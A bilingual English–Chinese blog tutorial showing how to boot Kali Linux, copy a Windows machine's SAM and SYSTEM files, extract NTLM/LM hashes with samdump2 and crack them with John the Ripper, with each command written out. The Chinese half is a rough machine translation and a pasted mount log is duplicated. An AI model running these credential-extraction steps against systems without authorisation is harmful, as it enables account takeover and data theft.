使用JOHN THE RIPPER破解WINDOWS密码

  • A+
所属分类:中英对照

JOHN THE RIPPER:- JOHN THE RIPPER: -

John the ripper is a password cracker tool, which try to detect weak passwords.开膛手约翰是一个密码破解工具,试图检测弱密码。 John the ripper can run on wide variety of passwords and hashes.开膛手John可以使用各种密码和哈希值。 This tool is also helpful in recovery of the password, in care you forget your password.此工具也有助于恢复密码,小心忘记密码。

John the ripper is popular because of the dictionary attacks & is mainly is used in bruteforce attacks.开膛手约翰因字典攻击而受欢迎,主要用于暴力攻击。 Ethical hacking researcher of iicybersecurity said this method is useful because many old firms still uses the windows old versions which is not good in terms of cybersecurity. iicybersecurity的道德黑客研究员表示,这种方法很有用,因为许多老公司仍然使用旧的版本,这在网络安全方面并不好。

CRACKING THE WINDOWS:- 破解WINDOWS: -

In windows, password is typically stored in SAM file in %SystemRoot%\system32\config.在Windows中,密码通常存储在%SystemRoot%\ system32 \ config中的SAM文件中 Windows uses the NTLM hash . Windows使用NTLM哈希 During the boot time the hashes from the SAM file gets decrypted using SYSKEY and hashes is loaded in registry which is then used for authentication purpose.在引导期间,SAM文件的哈希值使用SYSKEY进行解密,哈希值在注册表中加载,然后用于身份验证。

Windows does not allow users to copy the SAM file in another location so you have to use another OS to mount windows over it and copy the SAM file. Windows不允许用户将SAM文件复制到其他位置,因此您必须使用其他操作系统在其上安装窗口并复制SAM文件。 Once the file is copied we will decrypt the SAM file with SYSKEY and get the hashes for breaking the password.复制文件后,我们将使用SYSKEY解密SAM文件并获取用于破解密码的哈希值。

In below case we are using Kali Linux OS to mount the windows partition over it.在下面的例子中,我们使用Kali Linux OS在其上安装Windows分区。

  • For making the bootable disk you can use rufus freeware which is available here: https://rufus.ie/en_IE.html要制作可引导磁盘,您可以使用rufus免费软件,可在此处获取:https://rufus.ie/en_IE.html
  • This freeware is very easy to use.这个免费软件非常容易使用。 You simply have to select Kali linux iso image for making bootable disk.您只需选择Kali linux iso映像来制作可引导磁盘。
  • After creating the boot disk.创建启动盘后。 Simply boot with bootable disk and follow steps as mentioned below:只需使用可启动磁盘启动,然后按照以下步骤操作:
  • First you have to check the hard disk partition that where is the windows is installed.首先,您必须检查硬盘分区,Windows安装在哪里。 For that type fdisk -l.对于那种类型fdisk -l。

CHECKING THE HARD DISK PARTITIONS:- 检查硬磁盘分区: -

  • In the above screen shot, after executing the query the command has shown 3 partitions of the target hard disk.在上面的屏幕截图中,执行查询后,该命令显示了目标硬盘的3个分区。 By looking at size of partition you can know that where the target OS (Windows) in installed.通过查看分区大小,您可以知道安装目标操作系统(Windows)的位置。

MOUNT:- 安装:-

  • Type mkdir /mnt/CDrive for creating the directory.键入mkdir / mnt / CDrive以创建目录。
  • For mounting the hard disk partition /dev/sda2 to CDrive directory, 要将硬盘分区/ dev / sda2 挂载CDrive目录,   type mount /dev/sda2 /mnt/tmp/CDrive输入mount / dev / sda2 / mnt / tmp / CDrive
  • Then for checking the mount point.然后检查安装点。 Type ls -ltr /mnt/tmp/CDrive输入ls -ltr / mnt / tmp / CDrive
  • Type mount to check the mounted drive键入mount以检查已安装的驱动器 
root@kali:~/temp# mount sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime) proc on /proc type proc (rw,nosuid,nodev,noexec,relatime) udev on /dev type devtmpfs (rw,nosuid,relatime,size=2042548k,nr_inodes=201161,mode=755) devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000) tmpfs on /run type tmpfs (rw,nosuid,noexec,relatime,size=412292k,mode=755) /dev/sdb1 on /run/live/medium type vfat (ro,noatime,fmask=0022,dmask=0022,codepage=437,iocharset=ascii,shortname=mixed,utf8,errors=remount-ro) /dev/loop0 on /run/live/rootfs/filesystem.squashfs type squashfs (ro,noatime) tmpfs on /run/live/overlay type tmpfs (rw,noatime,size=2061444k,mode=755) overlay on / type overlay (rw,noatime,lowerdir=/run/live/rootfs/filesystem.squashfs/,upperdir=/run/live/overlay/rw,workdir=/run/live/overlay/work) tmpfs on /usr/lib/live/mount type tmpfs (rw,nosuid,noexec,relatime,size=412292k,mode=755) /dev/sdb1 on /usr/lib/live/mount/medium type vfat (ro,noatime,fmask=0022,dmas root @ kali:〜/ temp #mount sysfs on / sys type sysfs(rw,nosuid,nodev,noexec,relatime) proc on / proc type proc(rw,nosuid,nodev,noexec,relatime) udev on / dev type devtmpfs( rw,nosuid,relatime,size = 2042548k,nr_inodes = 201161,mode = 755) devpts on / dev / pts type devpts(rw,nosuid,noexec,relatime,gid = 5,mode = 620,ptmxmode = 000) tmpfs on /运行类型tmpfs(rw,nosuid,noexec,relatime,size = 412292k,mode = 755) / dev / sdb1 on / run / live / medium type vfat(ro,noatime,fmask = 0022,dmask = 0022,codepage = 437, iocharset = ascii,shortname = mixed,utf8,errors = remount-ro) / dev / loop0 on /run/live/rootfs/filesystem.squashfs type squashfs(ro,noatime) tmpfs on / run / live / overlay type tmpfs(rw ,noatime,size = 2061444k,mode = 755) overlay on / type overlay(rw,noatime,lowerdir = / run / live / rootfs / filesystem.squashfs /,upperdir = / run / live / overlay / rw,workdir = / run / live / overlay / work) tmpfs on / usr / lib / live / mount type tmpfs(rw,nosuid,noexec,relatime,size = 412292k,mode = 755) / dev / sdb1 on / usr / lib / live / mount /中型vfat(ro,noatime,fmask = 0022,dmas k=0022,codepage=437,iocharset=ascii,shortname=mixed,utf8,errors=remount-ro) /dev/loop0 on /usr/lib/live/mount/rootfs/filesystem.squashfs type squashfs (ro,noatime) tmpfs on /usr/lib/live/mount/overlay type tmpfs (rw,noatime,size=2061444k,mode=755) securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime) tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev) tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k) tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755) cgroup2 on /sys/fs/cgroup/unified type cgroup2 (rw,nosuid,nodev,noexec,relatime,nsdelegate) cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd) pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime) bpf on /sys/fs/bpf type bpf (rw,nosuid,nodev,noexec,relatime,mode=700) cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset) cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid k = 0022,codepage = 437,iocharset = ascii,shortname = mixed,utf8,errors = remount-ro) / dev / loop0 /usr/lib/live/mount/rootfs/filesystem.squashfs类型squashfs(ro,noatime) tmpfs on / usr / lib / live / mount / overlay类型tmpfs(rw,noatime,size = 2061444k,mode = 755) securityfs on / sys / kernel / security type securityfs(rw,nosuid,nodev,noexec,relatime) tmpfs on / dev / shm类型tmpfs(rw,nosuid,nodev) tmpfs on / run / lock类型tmpfs(rw,nosuid,nodev,noexec,relatime,size = 5120k) tmpfs on / sys / fs / cgroup type tmpfs(ro,nosuid ,nodev,noexec,mode = 755) cgroup2 on / sys / fs / cgroup / unified type cgroup2(rw,nosuid,nodev,noexec,relatime,nsdelegate) cgroup on / sys / fs / cgroup / systemd type cgroup(rw,nosuid ,nodev,noexec,relatime,xattr,name = systemd) pstore on / sys / fs / pstore type pstore(rw,nosuid,nodev,noexec,relatime) bpf on / sys / fs / bpf type bpf(rw,nosuid,nodev ,noexec,relatime,mode = 700) cgroup on / sys / fs / cgroup / cpuset type cgroup(rw,nosuid,nodev,noexec,relatime,cpuset) cgroup on / sys / fs / cgroup / cpu,cpuacct type cgroup(rw ,为nosuid ,nodev,noexec,relatime,cpu,cpuacct) cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory) cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids) cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio) cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event) cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio) cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices) cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer) systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=34,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=16732) hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime,pagesize=2M) mqueue on /dev/mqueue type mqueue (rw,relatime) debugfs on /sys/kernel/debug type debugfs (rw,relatime) tmpfs on /tmp type tmpfs (rw,nosuid,nod ,nodev,noexec,relatime,cpu,cpuacct) cgroup on / sys / fs / cgroup / memory type cgroup(rw,nosuid,nodev,noexec,relatime,memory) cgroup on / sys / fs / cgroup / pids type cgroup(rw ,nosuid,nodev,noexec,relatime,pids) cgroup on / sys / fs / cgroup / net_cls,net_prio type cgroup(rw,nosuid,nodev,noexec,relatime,net_cls,net_prio) cgroup on / sys / fs / cgroup / perf_event键入cgroup(rw,nosuid,nodev,noexec,relatime,perf_event) cgroup on / sys / fs / cgroup / blkio type cgroup(rw,nosuid,nodev,noexec,relatime,blkio) cgroup on / sys / fs / cgroup / devices键入cgroup(rw,nosuid,nodev,noexec,relatime,devices) cgroup on / sys / fs / cgroup / freezer type cgroup(rw,nosuid,nodev,noexec,relatime,freezer) systemd-1 on / proc / sys / fs / binfmt_misc类型autofs(rw,relatime,fd = 34,pgrp = 1,timeout = 0,minproto = 5,maxproto = 5,direct,pipe_ino = 16732) hugetlbfs on / dev / hugepages类型hugetlbfs(rw,relatime,pagesize = 2M) mqueue on / dev / mqueue类型mqueue(rw,relatime) debugfs on / sys / kernel / debug类型debugfs(rw,relatime) tmpfs on / tmp type tmpfs(rw,nosuid,nod ev,relatime) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime) tmpfs on /run/user/0 type tmpfs (rw,nosuid,nodev,relatime,size=412288k,mode=700) gvfsd-fuse on /run/user/0/gvfs type fuse.gvfsd-fuse (rw,nosuid,nodev,relatime,user_id=0,group_id=0) fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime) ev,relatime) binfmt_misc on / proc / sys / fs / binfmt_misc type binfmt_misc(rw,relatime) tmpfs on / run / user / 0 type tmpfs(rw,nosuid,nodev,relatime,size = 412288k,mode = 700) gvfsd- fuse on / run / user / 0 / gvfs type fuse.gvfsd-fuse(rw,nosuid,nodev,relatime,user_id = 0,group_id = 0) fusectl on / sys / fs / fuse / connections type fusectl(rw,relatime) 
 /dev/sda2 on /mnt/CDrive type fuseblk (rw,relatime,user_id=0,group_id=0,allow_other,blksize=4096) / dev / sda2 on / mnt / CDrive类型fuseblk(rw,relatime,user_id = 0,group_id = 0,allow_other,blksize = 4096)
  • In the above output, last line shows that target hard disk partition has been mounted to CDrive directory.在上面的输出中,最后一行显示目标硬盘分区已安装到CDrive目录。

COPYING THE SAM FILE:- 复制SAM文件: -

  • Type mkdir /tmp/temp输入mkdir / tmp / temp
  • Type cp /mnt/CDrive/Windows/System32/config/SAM /tmp/temp键入cp / mnt / CDrive / Windows / System32 / config / SAM / tmp / temp

SAM FILE:- SAM文件: -

  • Samdump2 fetches the SYSKEY and extract hashes from windows SAM file. Samdump2从Windows SAM文件中获取SYSKEY并提取哈希值。
  • For installing the samdump2 type sudo apt-get update after then type sudo apt-get install samdump2.为了安装samdump2类型sudo apt-get update ,然后键入sudo apt-get install samdump2。

COPYING THE SYSTEM FILE:- 复制系统文件: -

  • Now copy the SYSKEY file, type cp /mnt/CDrive/Windows/System32/config/SYSTEM /tmp/temp现在复制SYSKEY文件,输入cp / mnt / CDrive / Windows / System32 / config / SYSTEM / tmp / temp
  • Type samdump2 SYSTEM SAM 输入samdump2 SYSTEM SAM

  • In the above screen shot, after executing samdump2.在上面的屏幕截图中,执行samdump2之后。 The samdump2 will show the hashes in SAM files. samdump2将显示SAM文件中的哈希值。 In the next red marked there are 4 users on the target system.在下一个红色标记中,目标系统上有4个用户。
  • Now type samdump2 SYSTEM SAM > hash.txt for redirect the hash output to a file named hash.txt .现在输入samdump2 SYSTEM SAM> hash.txt ,将哈希输出重定向到名为hash.txt的文件。

CRACKING PASSWORD USING JOHN THE RIPPER:- 使用JOHN THE RIPPER破解密码: -

  • Type john –format=LM –wordlist=/root/usr/share/john/password_john.txt hash.txt输入john -format = LM -wordlist = / root / usr / share / john / password_john.txt hash.txt

  • In the above screen shot after executing above query.在执行上述查询后的上述屏幕截图中。 The wordlist will be used to crack the password. wordlist将用于破解密码。 As shown above the current password for the target OS is 123456.如上所示,目标OS的当前密码是123456。
  • Attacker can also use his own wordlist for cracking the password.攻击者也可以使用自己的wordlist来破解密码。 In kali linux many wordlists are available that can be used in cracking.在kali linux中,可以使用许多可用于破解的单词列表。 For using the kali linux wordlist go to -> / usr/share/wordlists/使用kali linux wordlist转到 - > / usr / share / wordlists /

NOTE:- The above method will work till WINDOWS 7 Operating system.注意: - 上述方法将一直运行到WINDOWS 7操作系统。 It will not work on WINDOWS 8/8.1/10它不适用于WINDOWS 8 / 8.1 / 10

 

Tags: , 标签:

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: